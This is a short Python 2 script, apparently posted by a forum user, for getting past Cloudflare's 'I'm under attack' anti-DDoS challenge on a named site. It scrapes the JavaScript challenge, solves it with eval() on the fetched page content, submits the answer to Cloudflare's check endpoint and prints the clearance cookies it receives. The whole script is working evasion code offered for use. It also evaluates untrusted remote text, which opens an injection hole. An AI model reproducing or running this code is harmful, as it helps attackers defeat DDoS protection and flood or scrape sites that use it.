'''
       Author: Cake/Rakes/Rainbowed
  Description: To show how shitty the cloudflare's DDoS protection "I'm under attack" actually is, doesn't even check if it has gone 5 seconds.
Chrome Plugin: https://chrome.google.com/webstore/detail/cloudflare-under-attack-m/jejhkneokgfdcmgihcppgpadcknbgfdf?hl=en-GB
'''
 
import requests, re, urlparse, sys
 
s = requests.session()
 
url = urlparse.urlparse('http://www.leak.sx/index.php')
 
page = s.get(url.geturl())
 
if page.status_code != 503:
	sys.exit('Page has no cloudflare please wait.')
 
answer = re.search('a\.value\s+=\s([\d\+\*\-]+)\;', page.content)
vc     = re.search('\"([a-fA-F\d]{32})\"',          page.content)
 
if answer == None or vc == None:
	sys.exit('Unable to grab the answers.')
 
vc     = vc.group(1)
answer = eval(answer.group(1) + '+' + str(len(url.netloc)))
 
print '\t\t\tVC = %s\n\t\tAnswer = %s\n' % (vc, answer)
 
output = s.get('http://%s/cdn-cgi/l/chk_jschl?jschl_vc=%s&jschl_answer=%d' % (url.netloc, vc, answer))
 
if output.status_code != 200:
	sys.exit('Failed to bypass Cloudflare')
 
print '\t  __cfduid = %s\n  cf_clearance = %s' % (s.cookies['__cfduid'], s.cookies['cf_clearance'])
